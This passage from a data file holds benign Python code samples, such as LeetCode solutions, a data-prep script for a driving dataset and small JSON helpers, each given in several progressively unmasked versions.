"step-3": "<mask token>\n\n\nclass Solution:\n\n def minDominoRotations(self, A: List[int], B: List[int]) ->int:\n if not A or not B:\n return 0\n if len(A) != len(B):\n return -1\n cnt_a, cnt_b = Counter(A), Counter(B)\n check_list = []\n for num, freq in cnt_a.items():\n check_list.append((freq, num, 'a'))\n for num, freq in cnt_b.items():\n check_list.append((freq, num, 'b'))\n check_list.sort(reverse=True)\n cnt = 0\n for freq, target, lst in check_list:\n if lst == 'a':\n to_list, from_list = A, B\n else:\n to_list, from_list = B, A\n invalid = False\n for i in range(len(A)):\n if to_list[i] == target:\n continue\n if from_list[i] != target:\n invalid = True\n break\n cnt += 1\n if not invalid:\n return cnt\n return -1\n",
"step-4": "from collections import Counter\n\n\nclass Solution:\n\n def minDominoRotations(self, A: List[int], B: List[int]) ->int:\n if not A or not B:\n return 0\n if len(A) != len(B):\n return -1\n cnt_a, cnt_b = Counter(A), Counter(B)\n check_list = []\n for num, freq in cnt_a.items():\n check_list.append((freq, num, 'a'))\n for num, freq in cnt_b.items():\n check_list.append((freq, num, 'b'))\n check_list.sort(reverse=True)\n cnt = 0\n for freq, target, lst in check_list:\n if lst == 'a':\n to_list, from_list = A, B\n else:\n to_list, from_list = B, A\n invalid = False\n for i in range(len(A)):\n if to_list[i] == target:\n continue\n if from_list[i] != target:\n invalid = True\n break\n cnt += 1\n if not invalid:\n return cnt\n return -1\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
/usr/local/python-3.6/lib/python3.6/abc.py
|
normal
|
{
"blob_id": "32d830f00a9d33b8f7f438c14b522ef186001bf3",
"index": 9392,
"step-1": "/usr/local/python-3.6/lib/python3.6/abc.py",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import kwic
# Smoke test: the three-line input should yield exactly three results.
mystr = "hello world\nmy test\napples oranges"
# Earlier variants of this check (kwic0/kwic1/kwic3 modules), kept for
# reference; note the typo "asseirt" in the first one.
#asseirt(kwic0.kwic(mystr) == [])
#assert(kwic1.kwic(mystr) == [mystr])
#assert(len(kwic3.kwic(mystr))==2)
assert len(kwic.kwic(mystr)) == 3
|
normal
|
{
"blob_id": "1f21fdc9a198b31bb0d5bd6dd8f46a1b3b28ec94",
"index": 6773,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nassert len(kwic.kwic(mystr)) == 3\n",
"step-3": "<mask token>\nmystr = \"\"\"hello world\nmy test\napples oranges\"\"\"\nassert len(kwic.kwic(mystr)) == 3\n",
"step-4": "import kwic\nmystr = \"\"\"hello world\nmy test\napples oranges\"\"\"\nassert len(kwic.kwic(mystr)) == 3\n",
"step-5": "import kwic\n\n\nmystr = \"hello world\\nmy test\\napples oranges\"\n#asseirt(kwic0.kwic(mystr) == [])\n#assert(kwic1.kwic(mystr) == [mystr])\n#assert(len(kwic3.kwic(mystr))==2)\nassert len(kwic.kwic(mystr)) == 3\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def get_reference():
json = sorted([os.path.join(args.ref, file) for file in os.listdir(args
.ref) if file.endswith('.json')])[0]
smap = simple_map.SimpleMap(json)
return smap.northing, smap.easting
<|reserved_special_token_0|>
def main():
jsons = sorted([os.path.join(args.src, file) for file in os.listdir(
args.src) if file.endswith('.json')])
construct_maps(jsons)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_reference():
json = sorted([os.path.join(args.ref, file) for file in os.listdir(args
.ref) if file.endswith('.json')])[0]
smap = simple_map.SimpleMap(json)
return smap.northing, smap.easting
def construct_maps(jsons):
cnt = 0
ref_globals = get_reference()
for i in range(len(jsons)):
smap = simple_map.SimpleMap(jsons[i], ref_globals)
(x, y), (x_real, y_real), imgs = smap.get_route()
imgs = [tuple(map(lambda x: cv2.resize(x, None, fx=0.2, fy=0.2),
img)) for img in imgs]
for j in range(0, len(imgs), 10):
for k in range(3):
cnt += 1
path = os.path.join(args.dst, str(cnt))
output_file = open(path, 'wb')
obj = {'x_steer': x[j], 'y_steer': y[j], 'x_utm': x_real[j],
'y_utm': y_real[j], 'img': imgs[j][k]}
pickle.dump(obj, output_file)
output_file.close()
print('* Video %d done, %s' % (i, jsons[i]))
def main():
jsons = sorted([os.path.join(args.src, file) for file in os.listdir(
args.src) if file.endswith('.json')])
construct_maps(jsons)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
argparser = argparse.ArgumentParser()
argparser.add_argument('--src', type=str, required=True, help=
'source directory')
argparser.add_argument('--dst', type=str, required=True, help=
'destination directory')
argparser.add_argument('--ref', type=str, required=False, default=
'train_raw', help='global reference directory (default: train_raw)')
args = argparser.parse_args()
def get_reference():
json = sorted([os.path.join(args.ref, file) for file in os.listdir(args
.ref) if file.endswith('.json')])[0]
smap = simple_map.SimpleMap(json)
return smap.northing, smap.easting
def construct_maps(jsons):
cnt = 0
ref_globals = get_reference()
for i in range(len(jsons)):
smap = simple_map.SimpleMap(jsons[i], ref_globals)
(x, y), (x_real, y_real), imgs = smap.get_route()
imgs = [tuple(map(lambda x: cv2.resize(x, None, fx=0.2, fy=0.2),
img)) for img in imgs]
for j in range(0, len(imgs), 10):
for k in range(3):
cnt += 1
path = os.path.join(args.dst, str(cnt))
output_file = open(path, 'wb')
obj = {'x_steer': x[j], 'y_steer': y[j], 'x_utm': x_real[j],
'y_utm': y_real[j], 'img': imgs[j][k]}
pickle.dump(obj, output_file)
output_file.close()
print('* Video %d done, %s' % (i, jsons[i]))
def main():
jsons = sorted([os.path.join(args.src, file) for file in os.listdir(
args.src) if file.endswith('.json')])
construct_maps(jsons)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import simple_map
import pickle
import os
import argparse
import cv2
argparser = argparse.ArgumentParser()
argparser.add_argument('--src', type=str, required=True, help=
'source directory')
argparser.add_argument('--dst', type=str, required=True, help=
'destination directory')
argparser.add_argument('--ref', type=str, required=False, default=
'train_raw', help='global reference directory (default: train_raw)')
args = argparser.parse_args()
def get_reference():
json = sorted([os.path.join(args.ref, file) for file in os.listdir(args
.ref) if file.endswith('.json')])[0]
smap = simple_map.SimpleMap(json)
return smap.northing, smap.easting
def construct_maps(jsons):
cnt = 0
ref_globals = get_reference()
for i in range(len(jsons)):
smap = simple_map.SimpleMap(jsons[i], ref_globals)
(x, y), (x_real, y_real), imgs = smap.get_route()
imgs = [tuple(map(lambda x: cv2.resize(x, None, fx=0.2, fy=0.2),
img)) for img in imgs]
for j in range(0, len(imgs), 10):
for k in range(3):
cnt += 1
path = os.path.join(args.dst, str(cnt))
output_file = open(path, 'wb')
obj = {'x_steer': x[j], 'y_steer': y[j], 'x_utm': x_real[j],
'y_utm': y_real[j], 'img': imgs[j][k]}
pickle.dump(obj, output_file)
output_file.close()
print('* Video %d done, %s' % (i, jsons[i]))
def main():
jsons = sorted([os.path.join(args.src, file) for file in os.listdir(
args.src) if file.endswith('.json')])
construct_maps(jsons)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import simple_map
import pickle
import os
import argparse
import cv2
argparser = argparse.ArgumentParser()
argparser.add_argument("--src", type=str, required=True,
help="source directory")
argparser.add_argument("--dst", type=str, required=True,
help="destination directory")
argparser.add_argument("--ref", type=str, required=False, default="train_raw",
help="global reference directory (default: train_raw)")
args = argparser.parse_args()
def get_reference():
    """Return (northing, easting) of the alphabetically-first JSON route in
    args.ref, used as the shared global origin for all maps."""
    ref_jsons = sorted(os.path.join(args.ref, name)
                       for name in os.listdir(args.ref)
                       if name.endswith(".json"))
    reference_map = simple_map.SimpleMap(ref_jsons[0])
    return reference_map.northing, reference_map.easting
def construct_maps(jsons):
    """Convert each recorded route in `jsons` into pickled per-frame samples
    written to args.dst, one file per sample, named by a running counter.

    Each sample is a dict with steering coords (x_steer/y_steer), UTM coords
    (x_utm/y_utm), and one resized camera image.
    """
    cnt = 0
    # get first map as reference so every route shares one global origin
    ref_globals = get_reference()
    for i in range(len(jsons)):
        smap = simple_map.SimpleMap(jsons[i], ref_globals)
        (x, y), (x_real, y_real), imgs = smap.get_route()
        # resize images to 20% in each dimension to keep samples small
        imgs = [tuple(cv2.resize(frame, None, fx=0.2, fy=0.2) for frame in img)
                for img in imgs]
        for j in range(0, len(imgs), 10):  # keep every 10th frame
            # assumes each frame tuple holds 3 camera views -- TODO confirm
            for k in range(3):
                cnt += 1
                path = os.path.join(args.dst, str(cnt))
                obj = {"x_steer": x[j], "y_steer": y[j],
                       "x_utm": x_real[j], "y_utm": y_real[j],
                       "img": imgs[j][k]}
                # FIX: context manager guarantees the file is closed even if
                # pickle.dump raises (the original left the handle open then).
                with open(path, 'wb') as output_file:
                    pickle.dump(obj, output_file)
        print("* Video %d done, %s" % (i, jsons[i]))
def main():
jsons = sorted([os.path.join(args.src, file) for file in os.listdir(args.src) if file.endswith(".json")])
construct_maps(jsons)
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "a8c59f97501b3f9db30c98e334dbfcffffe7accd",
"index": 6557,
"step-1": "<mask token>\n\n\ndef get_reference():\n json = sorted([os.path.join(args.ref, file) for file in os.listdir(args\n .ref) if file.endswith('.json')])[0]\n smap = simple_map.SimpleMap(json)\n return smap.northing, smap.easting\n\n\n<mask token>\n\n\ndef main():\n jsons = sorted([os.path.join(args.src, file) for file in os.listdir(\n args.src) if file.endswith('.json')])\n construct_maps(jsons)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_reference():\n json = sorted([os.path.join(args.ref, file) for file in os.listdir(args\n .ref) if file.endswith('.json')])[0]\n smap = simple_map.SimpleMap(json)\n return smap.northing, smap.easting\n\n\ndef construct_maps(jsons):\n cnt = 0\n ref_globals = get_reference()\n for i in range(len(jsons)):\n smap = simple_map.SimpleMap(jsons[i], ref_globals)\n (x, y), (x_real, y_real), imgs = smap.get_route()\n imgs = [tuple(map(lambda x: cv2.resize(x, None, fx=0.2, fy=0.2),\n img)) for img in imgs]\n for j in range(0, len(imgs), 10):\n for k in range(3):\n cnt += 1\n path = os.path.join(args.dst, str(cnt))\n output_file = open(path, 'wb')\n obj = {'x_steer': x[j], 'y_steer': y[j], 'x_utm': x_real[j],\n 'y_utm': y_real[j], 'img': imgs[j][k]}\n pickle.dump(obj, output_file)\n output_file.close()\n print('* Video %d done, %s' % (i, jsons[i]))\n\n\ndef main():\n jsons = sorted([os.path.join(args.src, file) for file in os.listdir(\n args.src) if file.endswith('.json')])\n construct_maps(jsons)\n\n\n<mask token>\n",
"step-3": "<mask token>\nargparser = argparse.ArgumentParser()\nargparser.add_argument('--src', type=str, required=True, help=\n 'source directory')\nargparser.add_argument('--dst', type=str, required=True, help=\n 'destination directory')\nargparser.add_argument('--ref', type=str, required=False, default=\n 'train_raw', help='global reference directory (default: train_raw)')\nargs = argparser.parse_args()\n\n\ndef get_reference():\n json = sorted([os.path.join(args.ref, file) for file in os.listdir(args\n .ref) if file.endswith('.json')])[0]\n smap = simple_map.SimpleMap(json)\n return smap.northing, smap.easting\n\n\ndef construct_maps(jsons):\n cnt = 0\n ref_globals = get_reference()\n for i in range(len(jsons)):\n smap = simple_map.SimpleMap(jsons[i], ref_globals)\n (x, y), (x_real, y_real), imgs = smap.get_route()\n imgs = [tuple(map(lambda x: cv2.resize(x, None, fx=0.2, fy=0.2),\n img)) for img in imgs]\n for j in range(0, len(imgs), 10):\n for k in range(3):\n cnt += 1\n path = os.path.join(args.dst, str(cnt))\n output_file = open(path, 'wb')\n obj = {'x_steer': x[j], 'y_steer': y[j], 'x_utm': x_real[j],\n 'y_utm': y_real[j], 'img': imgs[j][k]}\n pickle.dump(obj, output_file)\n output_file.close()\n print('* Video %d done, %s' % (i, jsons[i]))\n\n\ndef main():\n jsons = sorted([os.path.join(args.src, file) for file in os.listdir(\n args.src) if file.endswith('.json')])\n construct_maps(jsons)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import simple_map\nimport pickle\nimport os\nimport argparse\nimport cv2\nargparser = argparse.ArgumentParser()\nargparser.add_argument('--src', type=str, required=True, help=\n 'source directory')\nargparser.add_argument('--dst', type=str, required=True, help=\n 'destination directory')\nargparser.add_argument('--ref', type=str, required=False, default=\n 'train_raw', help='global reference directory (default: train_raw)')\nargs = argparser.parse_args()\n\n\ndef get_reference():\n json = sorted([os.path.join(args.ref, file) for file in os.listdir(args\n .ref) if file.endswith('.json')])[0]\n smap = simple_map.SimpleMap(json)\n return smap.northing, smap.easting\n\n\ndef construct_maps(jsons):\n cnt = 0\n ref_globals = get_reference()\n for i in range(len(jsons)):\n smap = simple_map.SimpleMap(jsons[i], ref_globals)\n (x, y), (x_real, y_real), imgs = smap.get_route()\n imgs = [tuple(map(lambda x: cv2.resize(x, None, fx=0.2, fy=0.2),\n img)) for img in imgs]\n for j in range(0, len(imgs), 10):\n for k in range(3):\n cnt += 1\n path = os.path.join(args.dst, str(cnt))\n output_file = open(path, 'wb')\n obj = {'x_steer': x[j], 'y_steer': y[j], 'x_utm': x_real[j],\n 'y_utm': y_real[j], 'img': imgs[j][k]}\n pickle.dump(obj, output_file)\n output_file.close()\n print('* Video %d done, %s' % (i, jsons[i]))\n\n\ndef main():\n jsons = sorted([os.path.join(args.src, file) for file in os.listdir(\n args.src) if file.endswith('.json')])\n construct_maps(jsons)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import simple_map\nimport pickle\nimport os\nimport argparse\nimport cv2\n\nargparser = argparse.ArgumentParser()\n\nargparser.add_argument(\"--src\", type=str, required=True,\n help=\"source directory\")\nargparser.add_argument(\"--dst\", type=str, required=True,\n help=\"destination directory\")\nargparser.add_argument(\"--ref\", type=str, required=False, default=\"train_raw\", \n help=\"global reference directory (default: train_raw)\")\nargs = argparser.parse_args()\n\n\ndef get_reference():\n json = sorted([os.path.join(args.ref, file) for file in os.listdir(args.ref) if file.endswith(\".json\")])[0]\n smap = simple_map.SimpleMap(json)\n return smap.northing, smap.easting\n\ndef construct_maps(jsons):\n cnt = 0\n\n # get first map as reference\n ref_globals = get_reference()\n \n for i in range(len(jsons)):\n smap = simple_map.SimpleMap(jsons[i], ref_globals)\n (x, y), (x_real, y_real), imgs = smap.get_route()\n\n # resize image\n imgs = [tuple(map(lambda x: cv2.resize(x, None, fx=0.2, fy=0.2), img)) for img in imgs]\n\n for j in range(0, len(imgs), 10):\n for k in range(3):\n cnt += 1\n path = os.path.join(args.dst, str(cnt))\n output_file = open(path, 'wb')\n obj = {\"x_steer\": x[j], \"y_steer\": y[j],\n \"x_utm\": x_real[j], \"y_utm\": y_real[j],\n \"img\": imgs[j][k]}\n pickle.dump(obj, output_file)\n output_file.close()\n\n print(\"* Video %d done, %s\" %( i, jsons[i]))\n\n\ndef main():\n jsons = sorted([os.path.join(args.src, file) for file in os.listdir(args.src) if file.endswith(\".json\")])\n construct_maps(jsons)\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
2,
3,
5,
6,
7
]
}
|
[
2,
3,
5,
6,
7
] |
# Definition for a binary tree node
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
# @param root, a tree node
# @return an integer
sum = 0
def sumNumbers(self, root):
def dfs(root,sofar):
if root.left is None and root.right is None:
self.sum += int(''.join(map(str,sofar+[root.val])))
return
if root.left is not None:
dfs(root.left,sofar+[root.val])
if root.right is not None:
dfs(root.right,sofar+[root.val])
if root is None:
return 0
dfs(root,[])
return self.sum
|
normal
|
{
"blob_id": "e6ac742eb74d5d18e4c304a8ea1331e7e16e403d",
"index": 2317,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n <mask token>\n",
"step-3": "class Solution:\n <mask token>\n\n def sumNumbers(self, root):\n\n def dfs(root, sofar):\n if root.left is None and root.right is None:\n self.sum += int(''.join(map(str, sofar + [root.val])))\n return\n if root.left is not None:\n dfs(root.left, sofar + [root.val])\n if root.right is not None:\n dfs(root.right, sofar + [root.val])\n if root is None:\n return 0\n dfs(root, [])\n return self.sum\n",
"step-4": "class Solution:\n sum = 0\n\n def sumNumbers(self, root):\n\n def dfs(root, sofar):\n if root.left is None and root.right is None:\n self.sum += int(''.join(map(str, sofar + [root.val])))\n return\n if root.left is not None:\n dfs(root.left, sofar + [root.val])\n if root.right is not None:\n dfs(root.right, sofar + [root.val])\n if root is None:\n return 0\n dfs(root, [])\n return self.sum\n",
"step-5": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return an integer\n sum = 0\n def sumNumbers(self, root):\n def dfs(root,sofar):\n if root.left is None and root.right is None:\n self.sum += int(''.join(map(str,sofar+[root.val])))\n return\n if root.left is not None:\n dfs(root.left,sofar+[root.val])\n if root.right is not None:\n dfs(root.right,sofar+[root.val])\n if root is None:\n return 0\n dfs(root,[])\n return self.sum\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def corec_unlock(lock):
locks_fn = 'corec_locks.json'
with open(locks_fn) as f:
locks = json.load(f)
locks[lock] = False
with open(locks_fn, 'w') as f:
json.dump(locks, f, indent=4)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def corec_set(parameter, value):
params_fn = 'corec_parameters.json'
with open(params_fn) as f:
params = json.load(f)
params[parameter] = value
with open(params_fn, 'w') as f:
json.dump(params, f, indent=4)
def corec_get(parameter):
params_fn = 'corec_parameters.json'
with open(params_fn) as f:
params = json.load(f)
if parameter in params:
return params[parameter]
return None
<|reserved_special_token_0|>
def corec_unlock(lock):
locks_fn = 'corec_locks.json'
with open(locks_fn) as f:
locks = json.load(f)
locks[lock] = False
with open(locks_fn, 'w') as f:
json.dump(locks, f, indent=4)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def corec_set(parameter, value):
params_fn = 'corec_parameters.json'
with open(params_fn) as f:
params = json.load(f)
params[parameter] = value
with open(params_fn, 'w') as f:
json.dump(params, f, indent=4)
def corec_get(parameter):
params_fn = 'corec_parameters.json'
with open(params_fn) as f:
params = json.load(f)
if parameter in params:
return params[parameter]
return None
def corec_lock(lock):
locks_fn = 'corec_locks.json'
with open(locks_fn) as f:
locks = json.load(f)
locks[lock] = True
with open(locks_fn, 'w') as f:
json.dump(locks, f, indent=4)
def corec_unlock(lock):
locks_fn = 'corec_locks.json'
with open(locks_fn) as f:
locks = json.load(f)
locks[lock] = False
with open(locks_fn, 'w') as f:
json.dump(locks, f, indent=4)
<|reserved_special_token_1|>
import json
def corec_set(parameter, value):
params_fn = 'corec_parameters.json'
with open(params_fn) as f:
params = json.load(f)
params[parameter] = value
with open(params_fn, 'w') as f:
json.dump(params, f, indent=4)
def corec_get(parameter):
params_fn = 'corec_parameters.json'
with open(params_fn) as f:
params = json.load(f)
if parameter in params:
return params[parameter]
return None
def corec_lock(lock):
locks_fn = 'corec_locks.json'
with open(locks_fn) as f:
locks = json.load(f)
locks[lock] = True
with open(locks_fn, 'w') as f:
json.dump(locks, f, indent=4)
def corec_unlock(lock):
locks_fn = 'corec_locks.json'
with open(locks_fn) as f:
locks = json.load(f)
locks[lock] = False
with open(locks_fn, 'w') as f:
json.dump(locks, f, indent=4)
<|reserved_special_token_1|>
import json
def corec_set(parameter, value):
params_fn = "corec_parameters.json"
with open(params_fn) as f:
params = json.load(f)
params[parameter] = value
with open(params_fn, 'w') as f:
json.dump(params, f, indent=4)
def corec_get(parameter):
params_fn = "corec_parameters.json"
with open(params_fn) as f:
params = json.load(f)
if parameter in params:
return params[parameter]
return None
def corec_lock(lock):
locks_fn = "corec_locks.json"
with open(locks_fn) as f:
locks = json.load(f)
locks[lock] = True
with open(locks_fn, 'w') as f:
json.dump(locks, f, indent=4)
def corec_unlock(lock):
locks_fn = "corec_locks.json"
with open(locks_fn) as f:
locks = json.load(f)
locks[lock] = False
with open(locks_fn, 'w') as f:
json.dump(locks, f, indent=4)
|
flexible
|
{
"blob_id": "88b3dd7414a68de65bafb317fbd4da2b1bc933fc",
"index": 991,
"step-1": "<mask token>\n\n\ndef corec_unlock(lock):\n locks_fn = 'corec_locks.json'\n with open(locks_fn) as f:\n locks = json.load(f)\n locks[lock] = False\n with open(locks_fn, 'w') as f:\n json.dump(locks, f, indent=4)\n",
"step-2": "<mask token>\n\n\ndef corec_set(parameter, value):\n params_fn = 'corec_parameters.json'\n with open(params_fn) as f:\n params = json.load(f)\n params[parameter] = value\n with open(params_fn, 'w') as f:\n json.dump(params, f, indent=4)\n\n\ndef corec_get(parameter):\n params_fn = 'corec_parameters.json'\n with open(params_fn) as f:\n params = json.load(f)\n if parameter in params:\n return params[parameter]\n return None\n\n\n<mask token>\n\n\ndef corec_unlock(lock):\n locks_fn = 'corec_locks.json'\n with open(locks_fn) as f:\n locks = json.load(f)\n locks[lock] = False\n with open(locks_fn, 'w') as f:\n json.dump(locks, f, indent=4)\n",
"step-3": "<mask token>\n\n\ndef corec_set(parameter, value):\n params_fn = 'corec_parameters.json'\n with open(params_fn) as f:\n params = json.load(f)\n params[parameter] = value\n with open(params_fn, 'w') as f:\n json.dump(params, f, indent=4)\n\n\ndef corec_get(parameter):\n params_fn = 'corec_parameters.json'\n with open(params_fn) as f:\n params = json.load(f)\n if parameter in params:\n return params[parameter]\n return None\n\n\ndef corec_lock(lock):\n locks_fn = 'corec_locks.json'\n with open(locks_fn) as f:\n locks = json.load(f)\n locks[lock] = True\n with open(locks_fn, 'w') as f:\n json.dump(locks, f, indent=4)\n\n\ndef corec_unlock(lock):\n locks_fn = 'corec_locks.json'\n with open(locks_fn) as f:\n locks = json.load(f)\n locks[lock] = False\n with open(locks_fn, 'w') as f:\n json.dump(locks, f, indent=4)\n",
"step-4": "import json\n\n\ndef corec_set(parameter, value):\n params_fn = 'corec_parameters.json'\n with open(params_fn) as f:\n params = json.load(f)\n params[parameter] = value\n with open(params_fn, 'w') as f:\n json.dump(params, f, indent=4)\n\n\ndef corec_get(parameter):\n params_fn = 'corec_parameters.json'\n with open(params_fn) as f:\n params = json.load(f)\n if parameter in params:\n return params[parameter]\n return None\n\n\ndef corec_lock(lock):\n locks_fn = 'corec_locks.json'\n with open(locks_fn) as f:\n locks = json.load(f)\n locks[lock] = True\n with open(locks_fn, 'w') as f:\n json.dump(locks, f, indent=4)\n\n\ndef corec_unlock(lock):\n locks_fn = 'corec_locks.json'\n with open(locks_fn) as f:\n locks = json.load(f)\n locks[lock] = False\n with open(locks_fn, 'w') as f:\n json.dump(locks, f, indent=4)\n",
"step-5": "\nimport json\n\ndef corec_set(parameter, value):\n\n\tparams_fn = \"corec_parameters.json\"\n\n\twith open(params_fn) as f:\n\t\tparams = json.load(f)\n\n\tparams[parameter] = value\n\n\twith open(params_fn, 'w') as f:\n\t\tjson.dump(params, f, indent=4)\n\ndef corec_get(parameter):\n\n\tparams_fn = \"corec_parameters.json\"\n\n\twith open(params_fn) as f:\n\t\tparams = json.load(f)\n\n\tif parameter in params:\n\t\treturn params[parameter]\n\n\treturn None\n\ndef corec_lock(lock):\n\tlocks_fn = \"corec_locks.json\"\n\n\twith open(locks_fn) as f:\n\t\tlocks = json.load(f)\n\n\tlocks[lock] = True\n\n\twith open(locks_fn, 'w') as f:\n\t\tjson.dump(locks, f, indent=4)\n\ndef corec_unlock(lock):\n locks_fn = \"corec_locks.json\"\n\n with open(locks_fn) as f:\n locks = json.load(f)\n\n locks[lock] = False\n\n with open(locks_fn, 'w') as f:\n json.dump(locks, f, indent=4)\n\n\n\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
# 30 - Faça um programa que receba três números e mostre - os em ordem crescentes.
n1 = int(input("Digite o primeiro número: "))
n2 = int(input("Digite o segundo número: "))
n3 = int(input("Digite o terceiro número: "))
if n1 <= n2 and n2 <= n3:
print(f'A ordem crescente é {n1}, {n2}, {n3}')
elif n1 <= n3 and n3 <= n2:
print(f'A ordem crescente é {n1}, {n3}, {n2}')
elif n2 <= n1 and n1 <= n3:
print(f'A ordem crescente é {n2}, {n1}, {n3}')
elif n2 <= n3 and n3 <= n1:
print(f'A ordem crescente é {n2}, {n3}, {n1}')
elif n3 <= n1 and n1 <= n2:
print(f'A ordem crescente é {n3}, {n1}, {n2}')
elif n3 <= n2 and n2 <= n1:
print(f'A ordem crescente é {n3}, {n2}, {n1}')
|
normal
|
{
"blob_id": "09712a397ad7915d9865b4aebf16606f85988f67",
"index": 2737,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif n1 <= n2 and n2 <= n3:\n print(f'A ordem crescente é {n1}, {n2}, {n3}')\nelif n1 <= n3 and n3 <= n2:\n print(f'A ordem crescente é {n1}, {n3}, {n2}')\nelif n2 <= n1 and n1 <= n3:\n print(f'A ordem crescente é {n2}, {n1}, {n3}')\nelif n2 <= n3 and n3 <= n1:\n print(f'A ordem crescente é {n2}, {n3}, {n1}')\nelif n3 <= n1 and n1 <= n2:\n print(f'A ordem crescente é {n3}, {n1}, {n2}')\nelif n3 <= n2 and n2 <= n1:\n print(f'A ordem crescente é {n3}, {n2}, {n1}')\n",
"step-3": "n1 = int(input('Digite o primeiro número: '))\nn2 = int(input('Digite o segundo número: '))\nn3 = int(input('Digite o terceiro número: '))\nif n1 <= n2 and n2 <= n3:\n print(f'A ordem crescente é {n1}, {n2}, {n3}')\nelif n1 <= n3 and n3 <= n2:\n print(f'A ordem crescente é {n1}, {n3}, {n2}')\nelif n2 <= n1 and n1 <= n3:\n print(f'A ordem crescente é {n2}, {n1}, {n3}')\nelif n2 <= n3 and n3 <= n1:\n print(f'A ordem crescente é {n2}, {n3}, {n1}')\nelif n3 <= n1 and n1 <= n2:\n print(f'A ordem crescente é {n3}, {n1}, {n2}')\nelif n3 <= n2 and n2 <= n1:\n print(f'A ordem crescente é {n3}, {n2}, {n1}')\n",
"step-4": "# 30 - Faça um programa que receba três números e mostre - os em ordem crescentes.\n\nn1 = int(input(\"Digite o primeiro número: \"))\nn2 = int(input(\"Digite o segundo número: \"))\nn3 = int(input(\"Digite o terceiro número: \"))\n\nif n1 <= n2 and n2 <= n3:\n print(f'A ordem crescente é {n1}, {n2}, {n3}')\nelif n1 <= n3 and n3 <= n2:\n print(f'A ordem crescente é {n1}, {n3}, {n2}')\nelif n2 <= n1 and n1 <= n3:\n print(f'A ordem crescente é {n2}, {n1}, {n3}')\nelif n2 <= n3 and n3 <= n1:\n print(f'A ordem crescente é {n2}, {n3}, {n1}')\nelif n3 <= n1 and n1 <= n2:\n print(f'A ordem crescente é {n3}, {n1}, {n2}')\nelif n3 <= n2 and n2 <= n1:\n print(f'A ordem crescente é {n3}, {n2}, {n1}')",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
print(1)
print(2)
print("Jenkins")
print("Jenkins2")
print("Jenkins3")
print("Jenkins44")
print("Jenkins55khlk")
print("3333333")
print("44444444")
print("jhjhj")
|
normal
|
{
"blob_id": "77a82f99ab10e3d53e3f8466d43b67e8b87c1588",
"index": 2418,
"step-1": "<mask token>\n",
"step-2": "print(1)\nprint(2)\nprint('Jenkins')\nprint('Jenkins2')\nprint('Jenkins3')\nprint('Jenkins44')\nprint('Jenkins55khlk')\nprint('3333333')\nprint('44444444')\nprint('jhjhj')\n",
"step-3": "print(1)\nprint(2)\nprint(\"Jenkins\")\nprint(\"Jenkins2\")\nprint(\"Jenkins3\")\nprint(\"Jenkins44\")\nprint(\"Jenkins55khlk\")\n\nprint(\"3333333\")\nprint(\"44444444\")\n\nprint(\"jhjhj\")\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from django.apps import AppConfig
class ScambioConfig(AppConfig):
name = 'scambio'
|
normal
|
{
"blob_id": "b091d00f5b5e997de87b36adbe9ce603a36ca49c",
"index": 3347,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass ScambioConfig(AppConfig):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass ScambioConfig(AppConfig):\n name = 'scambio'\n",
"step-4": "from django.apps import AppConfig\n\n\nclass ScambioConfig(AppConfig):\n name = 'scambio'\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open('sub.json', 'r') as subject_file:
subjects = json.load(subject_file)
print(json.dumps(subjects, separators=(',', ':')))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
subjects = []
with open('sub.json', 'r') as subject_file:
subjects = json.load(subject_file)
print(json.dumps(subjects, separators=(',', ':')))
<|reserved_special_token_1|>
import json
subjects = []
with open('sub.json', 'r') as subject_file:
subjects = json.load(subject_file)
print(json.dumps(subjects, separators=(',', ':')))
<|reserved_special_token_1|>
import json
subjects = []
with open("sub.json", 'r') as subject_file:
subjects = json.load(subject_file)
print(json.dumps(subjects, separators=(',',':')))
|
flexible
|
{
"blob_id": "98bd4eb25a76fb9184f9abfcb920a6fbe46b9394",
"index": 631,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open('sub.json', 'r') as subject_file:\n subjects = json.load(subject_file)\nprint(json.dumps(subjects, separators=(',', ':')))\n",
"step-3": "<mask token>\nsubjects = []\nwith open('sub.json', 'r') as subject_file:\n subjects = json.load(subject_file)\nprint(json.dumps(subjects, separators=(',', ':')))\n",
"step-4": "import json\nsubjects = []\nwith open('sub.json', 'r') as subject_file:\n subjects = json.load(subject_file)\nprint(json.dumps(subjects, separators=(',', ':')))\n",
